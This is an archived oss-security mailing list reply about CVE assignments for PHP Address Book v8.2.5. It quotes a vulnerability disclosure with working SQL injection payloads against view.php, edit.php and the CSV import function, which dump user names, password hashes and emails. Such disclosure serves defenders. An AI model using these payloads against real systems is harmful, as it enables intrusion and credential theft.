Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 17 Apr 2013 17:27:45 +0300
From: Henri Salo <henri@...v.fi>
To: Doraemon Sk8ers <doraemon.sk8ers@...il.com>
Cc: oss-security@...ts.openwall.com
Subject: Re: Multiple vulnerabilities in PHP Address Book
 v8.2.5

Hello,

I believe CVE-2013-1748 #1 is duplicate of CVE-2008-2565 as per OSVDB[1]. As far
as I know most of security vulnerabilities reported to this project haven't been
fixed. Haven't verified this detail. What php-addressbook project would need is
patches to fix all issues you can find. Finding vulnerabilities is easy -
fixing in upstream is not. I can help you if you are willing to write patches.
Takes hour or two :)

1: http://osvdb.org/45965

---
Henri Salo

On Wed, Apr 17, 2013 at 11:14:27AM +0800, Doraemon Sk8ers wrote:
> There is a SQL injection vulnerability and reflected XSS in Simple PHP
> Address Book v8.2.5.
> The 2 vulnerabilities had been assigned the CVE identifier CVE-2013-1748
> (SQLi) & CVE-2013-1749 (XSS) respectively.
> 
> # Software Link: http://sourceforge.net/projects/php-addressbook/
> # Version: v8.2.5
> # Tested on: v8.2.5
> # CVE : CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS)
> 
> 
> Details:
> -----------
> *
> *
> *CVE-2013-1748 (SQLi)*
> 
> We have discovered 3 pages which are prone to SQL Injection
> 
> 1.	/view.php?id=1
> The "id" parameter is vulnerable to SQL injection
> Injection Vector:
> 	/view.php?id=-1' union select '1','2','3','4',(select username from
> users limit 1),(select md5_pass from users limit 1),(select email from
> users limit 1),'8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41
> This injection vector will dump the username, md5 password and email
> of the first user in the user table onto the page itself
> 
> 2.	/edit.php
> Most of the fields on this page are vulnerable to SQL injection
> Injection Vector (inclusive of quotes):
> 	'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'
> This will dump out the ASCII value of the 1st character of the md5
> password of the first user
> 
> 3.	/import.php
> The same injection vulnerability as Point 2 above is also present in
> the import function
> Using the same injection vector, saved in a csv file
> 	'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'
> Similarly, this injection vector will dump out the ASCII value of the
> 1st character of the md5 password of the first user
> 
> The original input csv sample looks like this
> "Last name";"First
> name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail
> home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
> "thelastname";"thefirstname";"13.09.1951";"Street";"1234";"city,
> Country";"+1 123 456 789";"+2 345 678 910";"first.last@...l1.com";"+3
> 456 789 101";"+4 567 897 011";"first.last@...l2.net";"second street,
> 1234 secondcity, secondcountry";"+5 678 910 111"
> 
> The injected csv with the injected vectors looks like this
> "Last name";"First
> name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail
> home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
> "";"injectedthrucsv";"13.09.1951";"'+(select ASCII(SUBSTRING((SELECT
> md5_pass from users limit 1), 1)))+'";"";"city, Country";"+1 123 456
> 789";"+2 345 678 910";"first.last@...l1.com";"+3 456 789 101";"+4 567
> 897 011";"first.last@...l2.net";"second street, 1234 secondcity,
> secondcountry";"+5 678 910 111"
<snip>

[ CONTENT OF TYPE application/pgp-signature SKIPPED ]

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ